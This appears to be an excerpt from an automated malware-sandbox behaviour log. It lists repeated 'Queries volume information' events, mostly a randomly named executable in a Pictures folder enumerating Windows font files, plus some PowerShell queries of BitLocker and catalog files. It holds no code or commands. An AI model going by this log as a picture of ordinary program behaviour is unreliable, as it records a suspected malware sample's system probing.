Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
